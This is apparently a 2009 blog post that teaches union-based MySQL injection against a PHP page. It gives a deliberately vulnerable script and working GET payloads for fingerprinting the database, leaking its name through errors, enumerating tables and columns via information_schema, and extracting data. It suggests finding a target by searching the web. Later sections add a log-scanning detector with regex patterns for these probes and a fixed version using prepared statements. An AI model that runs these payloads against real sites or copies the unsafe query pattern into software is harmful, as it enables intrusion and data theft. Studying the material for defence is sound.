
Mysql injection [1]

April 26th, 2009

Today's post follows my previous publications on MySQL injection attacks: I examine the structure of the URLs used in the attack. As is known, each database has its own query language, and the language the application is written in makes no difference to the dynamic queries it builds... here we go:

0. Starting :

What is the first thing you need to attack? Knowledge? Imagination? Tools? ... No, you need a target. Get one simply by searching, or create a local database and connect the script below to MySQL:

<?php
    require_once('db.inc.php');                       // opens the MySQL connection
    $id = isset($_GET['id']) ? $_GET['id'] : 0;      // untrusted input, used as-is
    //$id = mysql_real_escape_string($_GET['id']);   // escaping only; useless in an integer context
    $result = mysql_query("SELECT user,id FROM table WHERE id=$id");   // $id is concatenated straight into the query: the injection point
    $bHeader = false;
    if ($result) {
        while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
            if (!$bHeader) {
                $bHeader = true;
                echo '<table border=1><tr>';
                foreach ($row as $k => $v)
                    echo "<th>$k</th>";
                echo '</tr>';
            }
            echo '<tr>';
            foreach ($row as $v)
                echo "<td>$v</td>";
            echo '</tr>';
        }
        if ($bHeader) echo '</table>';
    } else {
        //print(mysql_error());                       // uncomment to display the MySQL error
    }
?>

It never shows the MySQL errors returned; uncomment line 23 (the print(mysql_error()) call) and the errors will be shown clearly!

1. Gathering information :

Always start by collecting information. In most cases and portals the PHP pages connect to a MySQL database; however, that is not always true and won't be. The type of database is learned from the errors the application returns!

  • Attention: throughout this article the target is assumed to be unsafe and vulnerable, and all injection is explained via the GET method.

So, the single quote is commonly used:

/page.php?id=1'
  • Probably returned:
You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '\" at
line 1
And you see the database is MySQL.

2. Number of columns :

Find out the number of columns with "union select" or "order by"; since I covered it before, I skip it quickly here, so refer HERE. From here to the end of this article the target is imagined to have two columns!

3. Version of MySQL :

The version of MySQL is important because information_schema was introduced in MySQL 5; in older versions the attacker had no way to determine tables and columns directly, so their names had to be guessed... The following URL reveals the version of the database installed; the syntax is shown:

/page.php?id=-1 union select 1,version()

If 5.xx does not appear, you would continue by testing likely names; otherwise be prepared to go to the next step.

4. Name of database :

In this phase the database name of the target must be known specifically, otherwise you will get the tables of all databases! I mean, if the database name is not specified in the injected query, the tables of every database will be listed on the page... Let me get back to my point: a non-existent table name should be given so that an error is cleverly provoked:

/page.php?id=-1 union select 1,2 from blahblah
  • And the server responds:
Table 'Sc0rpion.blahblah' doesn't exist

The 'Sc0rpion' part is the database name that leaked!

5. Names of tables :

I'm going to show you how the tables are listed, the golden query:

/page.php?id=-1 union select table_name,2 from information_schema.tables
where TABLE_SCHEMA='Sc0rpion'

It shows all tables without any limitation. (As you see, the database name has to be between single quotes; the point here is that if either magic_quotes in php.ini is on or the query is secured by passing the value through mysql_real_escape_string(), the prevention is made around the single quote... so wait for the bonus stuff to bypass this minor piece of security!)

6. Names of columns :

We follow the previous structure; the query:

/page.php?id=-1 union all select column_name,2 from information_schema.columns
where TABLE_SCHEMA='Sc0rpion' and TABLE_NAME='table_name'

The user gets the columns belonging to 'table_name'; put a different table name per try!

7. Extracting the information :

Knowing the tables and columns, the injection is easy in pages having security holes; at last, grab the information:

/page.php?id=-1 union all select column_name,2 from table_name
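From the defender's side, the requests in steps 1 to 7 above leave a recognisable trail in the web server log. The following PHP is an added example, not part of the original post: it flags combined-format access-log lines that carry those probes (the log lines are constructed samples, and the pattern names are my own).

```php
<?php
// Added example (not part of the original post): flag access-log lines that
// carry the probes used in steps 1 to 7, for log review or a WAF rule.
// Assumes combined-format (Apache/nginx) log lines; samples are constructed.

// Patterns matching the post's probes, applied to the URL-decoded request target.
const SQLI_PATTERNS = [
    'quote_after_int'    => '/[?&]id=-?\d+\'/i',                // /page.php?id=1'
    'union_select'       => '/\bunion\b[\s+]+(all[\s+]+)?select\b/i',
    'version_probe'      => '/\bversion\s*\(\s*\)/i',
    'information_schema' => '/\binformation_schema\./i',
    'order_by_enum'      => '/\border[\s+]+by[\s+]+\d+/i',
];

// Return the names of every pattern that matches the request in one log line.
function classify_request(string $logLine): array
{
    // The request target sits in the quoted "METHOD /path?query HTTP/x.y" field.
    if (!preg_match('/"[A-Z]+ (\S+) HTTP\/[\d.]+"/', $logLine, $m)) {
        return [];
    }
    // Decode once so %27 / %20 and their literal forms are treated alike.
    $target = rawurldecode($m[1]);
    $hits = [];
    foreach (SQLI_PATTERNS as $name => $re) {
        if (preg_match($re, $target)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Constructed sample lines mirroring the URLs in the post (not real traffic).
$sample = [
    '203.0.113.5 - - [26/Apr/2009:10:00:01 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [26/Apr/2009:10:00:02 +0000] "GET /page.php?id=1%27 HTTP/1.1" 200 210',
    '203.0.113.5 - - [26/Apr/2009:10:00:03 +0000] "GET /page.php?id=-1%20union%20select%201,version() HTTP/1.1" 200 530',
    '203.0.113.5 - - [26/Apr/2009:10:00:04 +0000] "GET /page.php?id=-1+union+select+table_name,2+from+information_schema.tables HTTP/1.1" 200 900',
];
foreach ($sample as $line) {
    $hits = classify_request($line);
    echo ($hits ? 'ALERT [' . implode(',', $hits) . ']' : 'ok') . '  ' . $line . PHP_EOL;
}
```

Only the first sample line prints "ok"; the other three are flagged with the matching pattern names, so the same function can be fed a whole log with while (($line = fgets($fh)) !== false).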
  • What is the solution?

I've described checking the validity of string-format input HERE, but here we had integer values, which means escaping with mysql_real_escape_string() is functionally the wrong tool and the script would still be insecure. So wait for the next post on MySQL injection.
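As an added example that is not the post's own code, here is the same page rewritten so that neither the single quote nor the integer trick above gets anywhere near the query. It assumes db.inc.php creates a PDO connection in $pdo (an assumption) and uses `users` as a stand-in for the post's placeholder table name.

```php
<?php
// Added example (not the post's code): the same page with the hole closed.
// Assumes db.inc.php creates $pdo as a connected PDO instance (assumption)
// and that the real table is `users`; the post's `table` was a placeholder.
require_once('db.inc.php');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// 1. Validate the type first. id is an integer, so escaping quotes is the
//    wrong tool (the post's point); reject anything that is not a plain integer.
$raw = isset($_GET['id']) ? $_GET['id'] : '';
$id  = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
if ($id === false) {
    http_response_code(400);
    exit('invalid id');
}

try {
    // 2. Bind the value in a prepared statement so it can never become SQL,
    //    which also covers string columns where escaping would have been used.
    $stmt = $pdo->prepare('SELECT user, id FROM users WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
} catch (PDOException $e) {
    // 3. Keep driver errors out of the browser: they are what leaked the
    //    engine type and the database name in steps 1 and 4 of the post.
    error_log('page.php: ' . $e->getMessage());
    http_response_code(500);
    exit('internal error');
}

// 4. Escape on output too: the original echoed column values straight into HTML.
if ($rows) {
    echo '<table border=1><tr>';
    foreach (array_keys($rows[0]) as $k) {
        echo '<th>' . htmlspecialchars($k, ENT_QUOTES, 'UTF-8') . '</th>';
    }
    echo '</tr>';
    foreach ($rows as $row) {
        echo '<tr>';
        foreach ($row as $v) {
            echo '<td>' . htmlspecialchars((string) $v, ENT_QUOTES, 'UTF-8') . '</td>';
        }
        echo '</tr>';
    }
    echo '</table>';
}
```

With this version a request such as /page.php?id=1' is rejected with a 400 before any query is built, and a request with a valid id is bound as an integer parameter rather than pasted into the statement.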

Finally, take a look at Mormoroth's tutorial clip for a better understanding. Be safe!


  1. black hattitude
    October 18th, 2009 at 06:35 | #1

    Hi, thanks for the great quality of your blog, each time I come here, I'm amazed.

  2. Uncedyphync
    January 3rd, 2010 at 22:21 | #2

    Lots of guys blog about this issue but you said really true words!
